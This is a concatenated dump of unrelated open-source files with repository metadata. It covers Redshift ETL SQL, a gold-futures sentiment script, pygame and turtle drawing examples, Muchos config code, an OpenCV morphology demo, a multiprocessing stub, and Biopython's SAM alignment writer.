user_table_create = (""" CREATE TABLE IF NOT EXISTS users (user_id VARCHAR NOT NULL PRIMARY KEY, \
first_name VARCHAR, \
last_name VARCHAR, \
gender VARCHAR, \
level VARCHAR); """)
song_table_create = (""" CREATE TABLE IF NOT EXISTS songs (song_id VARCHAR NOT NULL PRIMARY KEY, \
title VARCHAR, \
artist_id VARCHAR NOT NULL, \
year VARCHAR, \
duration BIGINT ); """)
artist_table_create = (""" CREATE TABLE IF NOT EXISTS artists (artist_id VARCHAR NOT NULL PRIMARY KEY, \
name VARCHAR, \
location VARCHAR, \
latitude VARCHAR, \
longitude VARCHAR) ; """)
time_table_create = (""" CREATE TABLE IF NOT EXISTS time (start_time TIMESTAMP NOT NULL PRIMARY KEY , \
hour VARCHAR, \
day VARCHAR, \
week VARCHAR, \
month VARCHAR, \
year VARCHAR, \
weekday VARCHAR); """)
# STAGING TABLES
staging_events_copy = (""" copy staging_events from {} \
credentials 'aws_iam_role={}'\
json {} \
region 'us-west-2';""").format(config.get("S3", "LOG_DATA"), config.get("IAM_ROLE", "ARN"),config.get("S3", "LOG_JSONPATH"))
staging_songs_copy = (""" copy staging_songs from {} \
credentials 'aws_iam_role={}' \
json 'auto' \
region 'us-west-2';""").format(config.get("S3", "SONG_DATA"), config.get("IAM_ROLE", "ARN"))
# Final Tables
songplay_table_insert = (""" INSERT INTO songplay (start_time, \
user_id, \
level, \
song_id, \
artist_id, \
session_id, \
location, \
user_agent) \
(SELECT DISTINCT TIMESTAMP 'epoch' + ts/1000 *INTERVAL '1 second', \
userId, \
level, \
song_id, \
artist_id, \
sessionId, \
location, \
useragent \
FROM staging_songs, staging_events \
WHERE title = song \
AND artist = artist_name
AND page = 'NextSong' ) """)
user_table_insert = (""" INSERT INTO users (user_id, \
first_name, \
last_name, \
gender, \
level) \
(SELECT DISTINCT userId, \
firstName, \
lastname, \
gender, \
level \
FROM staging_events
WHERE page = 'NextSong') """)
song_table_insert = (""" INSERT INTO songs(song_id, \
title, \
artist_id, \
year, \
duration) \
(SELECT DISTINCT song_id, \
title, \
artist_id, \
year, \
duration \
FROM staging_songs) """)
artist_table_insert = (""" INSERT INTO artists (artist_id, \
name, \
location, \
latitude, \
longitude ) \
(SELECT DISTINCT artist_id, \
artist_name, \
artist_location, \
artist_latitude, \
artist_longitude \
FROM staging_songs )
""")
time_table_insert = (""" INSERT INTO time (start_time,hour,day,week,month,year,weekday) \
( SELECT DISTINCT(start_time) AS start_time, \
EXTRACT(hour FROM start_time) AS hour, \
EXTRACT(day FROM start_time) AS day, \
EXTRACT(week FROM start_time) AS week, \
EXTRACT(month FROM start_time) AS month, \
EXTRACT(year FROM start_time) AS year, \
EXTRACT(dayofweek FROM start_time) as weekday \
FROM songplay);
""")
# QUERY LISTS
create_table_queries = [staging_events_table_create, \
staging_songs_table_create, \
songplay_table_create, \
user_table_create, \
song_table_create, \
artist_table_create, \
time_table_create]
drop_table_queries = [staging_events_table_drop, \
staging_songs_table_drop, \
songplay_table_drop, \
user_table_drop, \
song_table_drop, \
artist_table_drop, \
time_table_drop]
copy_table_queries = [staging_events_copy, \
staging_songs_copy]
insert_table_queries = [songplay_table_insert, \
user_table_insert, \
song_table_insert, \
artist_table_insert, \
time_table_insert]
trunc_table_queries = [staging_events_table_trun, \
staging_songs_table_trun, \
songplay_table_trun, \
user_table_trun, \
song_table_trun, \
artist_table_trun, \
time_table_trun]
|
[
"noreply@github.com"
] |
noreply@github.com
|
9e750f8075d60ec1bff5c0ffbb0d33f61c64a8dd
|
2b7cc7d56ee829213d0111f9c729997f708f9c66
|
/CreateDB/main.py
|
0bfe8ad211906988fffb8422edc8c842c6550f66
|
[] |
no_license
|
Vincentie/TreePrediction
|
69bb3e92afdd9c33070a18478b604d94feaf45bb
|
47d632c5701916a581964bf683d4551e0ededca4
|
refs/heads/master
| 2021-01-20T17:29:30.309974
| 2018-09-01T14:57:43
| 2018-09-01T14:57:43
| 90,878,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
__author__ = 'JianxuanLiu'
from parse_and_save_data import parse_and_save_data
from tradeDays import getTradeDays
from computeSentimentals import computeSentiments
import numpy as np
import pandas as pd
from datetime import datetime
from datetime import timedelta
import sqlite3
""" This main.py is performed to create a data table whose data can be picked to aplly a prediction tree.
Specifically, volume weighted average prices of different gold futures' prices and sentimental grades
processed by NLP methods are those data to be trained in a prediction tree model.
"""
def computeVWFactor(df, factor):
""" Computer a series of factors in a DataFrame using volume weighted avearge method.
"""
df = df.replace('', np.nan)
df.fillna(method='pad')
df.fillna(method='bfill')
df1 = df[['Volume']].astype(float)
df2 = df[[factor]].astype(float)
df2.columns = ['Volume']
vw = np.sum((df1 * df2)['Volume']) / np.sum(df1['Volume'])
return vw
if __name__ == '__main__':
beginDate = '2012-01-01'
endDate = '2017-01-01'
saveUrl1 = 'Data/FData.sqlite'
saveUrl2 = 'Data/Sentiments.sqlite'
"""Parse and save data"""
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_trade').parse_and_save_data()
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_sentiments').parse_and_save_data()
"""Obatain the trading data and sentimental grades of every day for future use."""
con = sqlite3.connect(saveUrl1)
sql = "SELECT * from SHFE"
data = pd.read_sql(sql, con)
avgdata = {}
sentiDict = computeSentiments(beginDate, endDate, saveUrl2).getSentiments()
"""Compute the volume weighted average factors and concatenate them with the sentimental grades."""
for date in getTradeDays(beginDate, endDate):
temp_df = data[data.date == date + ' ' + '00:00:00']
values = []
for item in ['Close', 'High', 'Low', 'Change2', 'ChangeofOpenInt']:
values.append(computeVWFactor(temp_df, item))
values.append(float(sum(temp_df['Volume']))) #Add the total trading volume to the values.
values.append(sentiDict[date]) #Add sentimental grades to the values.
key = date
avgdata.setdefault(key, values)
"""Insert the handled data into a new table."""
conna = sqlite3.connect('Data/FAvgData.sqlite')
cursor = conna.cursor()
SQLquery1 = "create table if not exists SHFEAvg(date datetime, Close numeric(15,2), High numeric(15,2), Low numeric(15,2),\
Change2 numeric(15,2), ChangeofOpenInt numeric(25,2), Volume numeric(15,2), Sentiment numeric(15,2) )"
cursor.execute(SQLquery1)
for key, value in avgdata.items():
iter = (key, value[0], value[1], value[2], value[3], value[4], value[5], value[6])
SQLquery2 = "insert into SHFEAvg" + " " + "values(?, ?, ?, ?, ?, ?, ?, ?)"
cursor.execute(SQLquery2, iter)
conna.commit()
conna.close()
|
[
"lavinho@hotmail.com"
] |
lavinho@hotmail.com
|
f18eaaed0fbf1f40f0d8fed1c9e176c104f334bf
|
4454ed622d051f602373d7946a3936ff33cc8e97
|
/alien/enemy.py
|
1536b22abde5d8b5dd744b37d3c66d5005970225
|
[] |
no_license
|
showlocked/plane_game
|
23c056c7b85c00184c357001db21300d5eb1680e
|
b25cd1fdbce2735c903bbedb02fd85a457bcdc8f
|
refs/heads/master
| 2021-09-26T22:00:14.874451
| 2017-12-24T18:21:19
| 2017-12-24T18:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
from random import random
import pygame
from pygame.sprite import Sprite
__author__ = 'heshipeng'
class Enemy(Sprite):
""" 敌方飞机类 """
def __init__(self, ali_settings, screen):
""" 初始化外星人并设置其初始位置 """
super(Enemy, self).__init__()
self.screen = screen
self.ali_settings = ali_settings
# 加载外星人图像,并设置其rect属性
self.image = pygame.image.load('images/enemy_plane.png')
self.rect = self.image.get_rect()
# 根据敌方飞机出现位置判断移动方向
self.move_right = True
# 每个外星人初始都在屏幕左上角附近
self.rect.x = self.get_width()
self.rect.y = self.rect.height
# 存储敌方飞机的准确位置
self.x = float(self.rect.x)
self.y = float(self.rect.y)
def blitme(self):
""" 在指定位置画敌方飞机 """
self.screen.blit(self.image, self.rect)
def update(self, *args):
if self.move_right:
self.x += self.ali_settings.enemy_speed_factor
else:
self.x -= self.ali_settings.enemy_speed_factor
self.y += self.ali_settings.enemy_speed_factor
self.rect.x = self.x
self.rect.y = self.y
def get_width(self):
width_range = [0, self.screen.get_rect().right]
if random() > 0.5:
self.move_right = True
return width_range[0]
else:
self.move_right = False
return width_range[1]
|
[
"727138269@qq.com"
] |
727138269@qq.com
|
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025
| 2015-12-10T08:56:33
| 2015-12-10T08:56:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,156
|
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports buffer inteface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file decriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"sirnikolasd@yandex.ru"
] |
sirnikolasd@yandex.ru
|
ba7cf89efb3b3e047499591256a9cb869bc442da
|
351f709d96fc08b2f42f2dd42efe02bff76f41a3
|
/turtleDraw.py
|
43a47232ccafb0270905bcad25214f5e0d2dae93
|
[] |
no_license
|
ChristopherGawdzikD/Turtles
|
69f9a36627eeea5e7f1d38bbce6126fbe09c91d9
|
8eeb33f2706c15ba6e4bbb869cada5bebf941616
|
refs/heads/master
| 2022-12-04T00:02:12.125401
| 2020-08-16T18:54:40
| 2020-08-16T18:54:40
| 288,003,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import*
def getAudiLogo():
# Will make audi logo
#Uses two for loops with one nested
for i in range(4):
for x in ["grey"]:
color(x)
pensize(5)
circle(50)
forward(60)
print(getAudiLogo())
|
[
"noreply@github.com"
] |
noreply@github.com
|
78db018846126fb9febd6f19a4e4506f2d44c459
|
4ea4f9f8cbb652aea7f82089eb39b8a86a466a81
|
/lib/muchos/config/__init__.py
|
13294f17e2ca9040fc4f68596eaa0a65f18d19d9
|
[
"Apache-2.0"
] |
permissive
|
shannawaz/fluo-muchos
|
62ef9bf65baae3a823630fc11e35b4620aac2056
|
98102a5b14a71642a7972d20d57b38373a375577
|
refs/heads/master
| 2020-09-24T02:40:37.204495
| 2020-03-24T18:06:38
| 2020-03-24T18:06:38
| 225,641,914
| 0
| 0
|
Apache-2.0
| 2019-12-03T14:37:26
| 2019-12-03T14:37:26
| null |
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from muchos.config.base import BaseConfig, SERVICES, OPTIONAL_SERVICES
from muchos.config.existing import ExistingDeployConfig
from muchos.config.ec2 import Ec2DeployConfig
from muchos.config.azure import AzureDeployConfig
from configparser import ConfigParser
def DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name):
c = ConfigParser()
c.read(config_path)
cluster_type = c.get('general', 'cluster_type')
if cluster_type == 'existing':
return ExistingDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'ec2':
return Ec2DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'azure':
return AzureDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
|
[
"kturner@apache.org"
] |
kturner@apache.org
|
e87ab2c053552be6df6333daf37c54e1c4e56527
|
3adf9934a74077c328b9a0afff37f8ca355eead1
|
/comicresizer/forms.py
|
a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e
|
[] |
no_license
|
jgasteiz/comic-resizer
|
36671623fe9909f23fba793b44cf4ac56380926a
|
12d2e12efdf2017746d67a4b6d9616613ee58bb9
|
refs/heads/master
| 2021-07-05T05:56:00.911958
| 2017-09-27T07:43:58
| 2017-09-27T07:45:25
| 104,987,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
|
[
"javi.manzano.oller@gmail.com"
] |
javi.manzano.oller@gmail.com
|
746945952b0fab1f51ee929ad0f0cbeb6aad6a22
|
4fd90203c000cc4c15fc6d4538e9536f812af05a
|
/Chapter05/Erosion_Dilation.py
|
c59037f09ddb47686ea3c34fcf5f01d7aa86b049
|
[
"MIT"
] |
permissive
|
drabdkadir/GettingStartedwithPythonfortheInternetofThings
|
77487bbece9fd73ac7d5759d108686e6348dee66
|
86b57062879baaafd8a7ad332057359874bb3978
|
refs/heads/master
| 2020-12-06T15:41:03.055803
| 2019-02-19T10:09:20
| 2019-02-19T10:09:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
# Erosion and Dilation are Morphological Operations
# Erosion: Removes pixels at the boundaries of objects in an image
# Dilation: Adds pixels to the boundaries of objects in an image
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np
# Read the image using imread built-in function
image = cv2.imread('image_4.jpg')
# Display original image using imshow built-in function
cv2.imshow("Original", image)
# Wait until any key is pressed
cv2.waitKey(0)
# np.ones returns an array, given shape and type, filled with ones
# np.ones(shape, dtype)
kernel = np.ones((5,5), dtype = "uint8")
# 5 x 5 is the dimension of the kernal
# uint8: is an unsigned integer (0 to 255)
# cv2.erode is the built-in function used for erosion
# cv2.erode(image, kernel, iterations)
erosion = cv2.erode(image, kernel, iterations = 1)
# Display image after erosion using imshow built-in function
cv2.imshow("Erosion", erosion)
# Wait until any key is pressed
cv2.waitKey(0)
# cv2.dilate is the built-in function used for dilation
# cv2.dilate(image, kernel, iterations)
dilation = cv2.dilate(image, kernel, iterations = 1)
# Display image after dilation using imshow built-in function
cv2.imshow("Dilation", dilation)
# Wait until any key is pressed
cv2.waitKey(0)
# Close all windows
cv2.destroyAllWindows()
|
[
"packtadrian@gmail.com"
] |
packtadrian@gmail.com
|
dfffaf1c880faeb1839261b33d4f3388ffc6080d
|
6a84e70184c2ea229a0db4f472426d7d585a1a4a
|
/turtle/lego_heads/head_c_while.py
|
74d373d3ad6ccfd35150faee6d67bf72d756765e
|
[] |
no_license
|
GBSL-Informatik/python-examples
|
5bcf89e255b05dac4a6b7e55efbbe144a2acc070
|
b0ac92a8ebda2cc665d0cc4a8f3d69f3ccfb211f
|
refs/heads/master
| 2023-01-02T15:28:27.863878
| 2020-11-01T21:00:19
| 2020-11-01T21:00:19
| 283,978,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
from gbsl_turtle import *
goto(-30, 0, draw=False)
counter = 0
while counter < 8:
forward(60)
left(45)
counter = counter + 1
goto(-30, 100, draw=False)
setheading(180) # Orientierung nach links: ◀️
counter = 0
while counter < 8:
forward(5)
right(45)
counter = counter + 1
goto(30, 100, draw=False)
setheading(0) # Orientierung nach rechts: ▶️
counter = 0
while counter < 8:
forward(5)
left(45)
counter = counter + 1
goto(-48, 40, draw=False)
setheading(-45) # Orientierung nach rechts unten: ↘️
counter = 0
while counter < 3:
forward(40)
left(45)
counter = counter + 1
done()
|
[
"lebalz@outlook.com"
] |
lebalz@outlook.com
|
05da5fd12fbafb2386db3b2f9980d4c9d9063e02
|
5d34689e0fe3dea453416bd7849b8028e1a0b3e4
|
/Bio/Align/sam.py
|
522ded168bad2599cfc7bd7e1c5d2cc887ca7f9c
|
[
"BSD-3-Clause",
"LicenseRef-scancode-biopython"
] |
permissive
|
fabianegli/biopython
|
2996d4209933b15e42db7e95f4a36d84a4df0ebd
|
06a96c0311ec7a8b714adff9f8b6d3414ecc70a0
|
refs/heads/master
| 2022-09-04T15:33:07.733522
| 2022-08-09T10:18:45
| 2022-08-09T10:18:45
| 167,009,089
| 0
| 0
|
NOASSERTION
| 2022-06-15T13:27:43
| 2019-01-22T14:34:52
|
Python
|
UTF-8
|
Python
| false
| false
| 30,190
|
py
|
# Copyright 2022 by Michiel de Hoon. All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Bio.Align support for the "sam" pairwise alignment format.
The Sequence Alignment/Map (SAM) format, created by Heng Li and Richard Durbin
at the Wellcome Trust Sanger Institute, stores a series of alignments to the
genome in a single file. Typically they are used for next-generation sequencing
data. SAM files store the alignment positions for mapped sequences, and may
also store the aligned sequences and other information associated with the
sequence.
See http://www.htslib.org/ for more information.
You are expected to use this module via the Bio.Align functions.
Coordinates in the SAM format are defined in terms of one-based start
positions; the parser converts these to zero-based coordinates to be consistent
with Python and other alignment formats.
"""
from itertools import chain
import copy
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Please install numpy if you want to use Bio.Align. "
"See http://www.numpy.org/"
) from None
from Bio.Align import Alignment
from Bio.Align import interfaces
from Bio.Seq import Seq, reverse_complement, UndefinedSequenceError
from Bio.SeqRecord import SeqRecord
from Bio import BiopythonExperimentalWarning
import warnings
warnings.warn(
"Bio.Align.sam is an experimental module which may undergo "
"significant changes prior to its future official release.",
BiopythonExperimentalWarning,
)
class AlignmentWriter(interfaces.AlignmentWriter):
"""Alignment file writer for the Sequence Alignment/Map (SAM) file format."""
def __init__(self, target, md=False):
"""Create an AlignmentWriter object.
Arguments:
- md - If True, calculate the MD tag from the alignment and include it
in the output.
If False (default), do not include the MD tag in the output.
"""
super().__init__(target, mode="w")
self.md = md
def write_header(self, alignments):
"""Write the SAM header."""
try:
metadata = alignments.metadata
except AttributeError:
metadata = {}
try:
targets = alignments.targets
except AttributeError:
targets = {}
values = metadata.get("HD")
if values is not None:
# if HD is present, then VN is required and must come first
fields = ["@HD", "VN:%s" % values["VN"]]
for key, value in values.items():
if key == "VN":
continue
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
for rname, record in targets.items():
assert rname == record.id
fields = ["@SQ"]
fields.append("SN:%s" % rname)
length = len(record.seq)
fields.append("LN:%d" % length)
for key, value in record.annotations.items():
if key == "alternate_locus":
fields.append("AH:%s" % value)
elif key == "names":
fields.append("AN:%s" % ",".join(value))
elif key == "assembly":
fields.append("AS:%s" % value)
elif key == "MD5":
fields.append("M5:%s" % value)
elif key == "species":
fields.append("SP:%s" % value)
elif key == "topology":
assert value in ("linear", "circular")
fields.append("PP:%s" % value)
elif key == "URI":
fields.append("UR:%s" % value)
else:
fields.append("%s:%s" % (key[:2], value))
try:
description = record.description
except AttributeError:
pass
else:
if description != "<unknown description>":
fields.append("DS:%s" % description)
line = "\t".join(fields) + "\n"
self.stream.write(line)
for tag, rows in metadata.items():
if tag == "HD": # already written
continue
for row in rows:
fields = ["@" + tag]
for key, value in row.items():
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
def format_alignment(self, alignment, md=None):
    """Return a string with a single alignment formatted as one SAM line.

    Arguments:
     - alignment - an Alignment object with two sequences (target, query).
     - md - if not None, overrides self.md for this call: True forces the
       MD tag to be calculated and included, False suppresses it.

    Raises TypeError if alignment is not an Alignment, and ValueError for
    inconsistent coordinates or when an MD tag is requested although the
    query sequence contents are undefined.
    """
    if not isinstance(alignment, Alignment):
        raise TypeError("Expected an Alignment object")
    coordinates = alignment.coordinates.transpose()
    target, query = alignment.sequences
    hard_clip_left = None
    hard_clip_right = None
    try:
        qName = query.id
    except AttributeError:
        # Plain sequence without metadata; use placeholder name.
        qName = "query"
        qual = "*"
    else:
        try:
            hard_clip_left = query.annotations["hard_clip_left"]
        except (AttributeError, KeyError):
            pass
        try:
            hard_clip_right = query.annotations["hard_clip_right"]
        except (AttributeError, KeyError):
            pass
        try:
            qual = query.letter_annotations["phred_quality"]
        except (AttributeError, KeyError):
            qual = "*"
        query = query.seq
    qSize = len(query)
    try:
        rName = target.id
    except AttributeError:
        rName = "target"
    else:
        target = target.seq
    tSize = len(target)
    if coordinates[0, 1] < coordinates[-1, 1]:  # mapped to forward strand
        flag = 0
    else:  # mapped to reverse strand
        flag = 16
        query = reverse_complement(query, inplace=False)
        coordinates = numpy.array(coordinates)
        # Express query coordinates relative to the reverse-complement.
        coordinates[:, 1] = qSize - coordinates[:, 1]
        hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
    try:
        query = bytes(query)
    except TypeError:  # string
        pass
    except UndefinedSequenceError:
        query = "*"
    else:
        query = str(query, "ASCII")
    tStart, qStart = coordinates[0, :]
    pos = tStart
    cigar = ""
    if hard_clip_left is not None:
        cigar += "%dH" % hard_clip_left
    if qStart > 0:
        cigar += "%dS" % qStart
    try:
        operations = alignment.operations
    except AttributeError:
        operations = None
        # Without stored operations, derive the CIGAR from the coordinate
        # steps alone (only M/I/D can be distinguished).
        for tEnd, qEnd in coordinates[1:, :]:
            tCount = tEnd - tStart
            qCount = qEnd - qStart
            if tCount == 0:
                cigar += "%dI" % qCount  # insertion to the reference
                qStart = qEnd
            elif qCount == 0:
                cigar += "%dD" % tCount  # deletion from the reference
                tStart = tEnd
            else:
                if tCount != qCount:
                    raise ValueError("Unequal step sizes in alignment")
                cigar += "%dM" % tCount
                tStart = tEnd
                qStart = qEnd
    else:
        for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
            tCount = tEnd - tStart
            qCount = qEnd - qStart
            if tCount == 0:
                assert operation == ord("I")
                cigar += "%dI" % qCount  # insertion to the reference
                qStart = qEnd
            elif qCount == 0:
                if operation == ord("N"):
                    cigar += "%dN" % tCount  # skipped region from the reference
                elif operation == ord("D"):
                    cigar += "%dD" % tCount  # deletion from the reference
                else:
                    raise ValueError(f"Unexpected operation {operation}")
                tStart = tEnd
            else:
                if tCount != qCount:
                    raise ValueError("Unequal step sizes in alignment")
                assert operation == ord("M")
                cigar += "%dM" % tCount
                tStart = tEnd
                qStart = qEnd
    if qEnd < qSize:
        cigar += "%dS" % (qSize - qEnd)
    if hard_clip_right is not None:
        cigar += "%dH" % hard_clip_right
    try:
        mapq = alignment.mapq
    except AttributeError:
        mapq = 255  # not available
    rNext = "*"
    pNext = 0
    tLen = 0
    fields = [
        qName,
        str(flag),
        rName,
        str(pos + 1),  # 1-based coordinates
        str(mapq),
        cigar,
        rNext,
        str(pNext),
        str(tLen),
        query,
        qual,
    ]
    if md is None:
        md = self.md
    if md is True:
        if query == "*":
            raise ValueError("requested MD tag with undefined sequence")
        # calculate the MD tag from the alignment coordinates and sequences
        tStart, qStart = coordinates[0, :]
        number = 0
        md = ""
        if operations is None:
            for tEnd, qEnd in coordinates[1:, :]:
                tCount = tEnd - tStart
                qCount = qEnd - qStart
                if tCount == 0:
                    # insertion to the reference
                    qStart = qEnd
                elif qCount == 0:
                    # deletion from the reference
                    if number:
                        md += str(number)
                        number = 0
                    md += "^" + target[tStart:tEnd]
                    tStart = tEnd
                else:
                    # alignment match
                    if tCount != qCount:
                        raise ValueError("Unequal step sizes in alignment")
                    for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
                        if tc == qc:
                            number += 1
                        else:
                            md += str(number) + tc
                            number = 0
                    tStart = tEnd
                    qStart = qEnd
            if number:
                md += str(number)
        else:
            for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
                tCount = tEnd - tStart
                qCount = qEnd - qStart
                if tCount == 0:
                    # insertion to the reference
                    qStart = qEnd
                elif qCount == 0:
                    if operation != ord("N"):
                        # deletion from the reference (N regions are not
                        # represented in the MD string)
                        if number:
                            md += str(number)
                            number = 0
                        md += "^" + target[tStart:tEnd]
                    tStart = tEnd
                else:
                    # alignment match
                    if tCount != qCount:
                        raise ValueError("Unequal step sizes in alignment")
                    for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
                        if tc == qc:
                            number += 1
                        else:
                            md += str(number) + tc
                            number = 0
                    tStart = tEnd
                    qStart = qEnd
            if number:
                md += str(number)
        field = "MD:Z:%s" % md
        fields.append(field)
    try:
        score = alignment.score
    except AttributeError:
        pass
    else:
        field = "AS:i:%d" % int(round(score))
        fields.append(field)
    try:
        annotations = alignment.annotations
    except AttributeError:
        pass
    else:
        for key, value in annotations.items():
            if isinstance(value, int):
                datatype = "i"
                value = str(value)
            elif isinstance(value, float):
                datatype = "f"
                value = str(value)
            elif isinstance(value, str):
                if len(value) == 1:
                    datatype = "A"
                else:
                    datatype = "Z"
            elif isinstance(value, bytes):
                datatype = "H"
                # BUG FIX: H-type values are hex strings (two hex digits
                # per byte) per the SAM specification; the original joined
                # decimal byte values, which cannot be parsed back.
                value = "".join("%02X" % byte for byte in value)
            elif isinstance(value, numpy.ndarray):
                # BUG FIX: the original tested isinstance(value, numpy.array);
                # numpy.array is a function, not a type, so isinstance always
                # raised TypeError.  numpy.ndarray is the actual array type.
                datatype = "B"
                if numpy.issubdtype(value.dtype, numpy.integer):
                    letter = "i"
                elif numpy.issubdtype(value.dtype, float):
                    letter = "f"
                else:
                    raise ValueError(
                        f"Array of incompatible data type {value.dtype} in annotation '{key}'"
                    )
                # BUG FIX: the B-type value must start with the subtype
                # letter ("B:<letter>,v1,v2,..."); the original computed
                # `letter` but never included it in the output.
                value = letter + "," + ",".join(map(str, value))
            field = f"{key}:{datatype}:{value}"
            fields.append(field)
    line = "\t".join(fields) + "\n"
    return line
class AlignmentIterator(interfaces.AlignmentIterator):
    """Alignment iterator for Sequence Alignment/Map (SAM) files.

    Each line in the file contains one genomic alignment, which are loaded
    and returned incrementally.  The following columns are stored as
    attributes of the alignment:

     - flag: The FLAG combination of bitwise flags;
     - mapq: Mapping Quality (only stored if available)
     - rnext: Reference sequence name of the primary alignment of the next
       read in the alignment (only stored if available)
     - pnext: Zero-based position of the primary alignment of the next read
       in the template (only stored if available)
     - tlen: signed observed template length (only stored if available)

    Other information associated with the alignment by its tags are stored
    in the annotations attribute of each alignment.

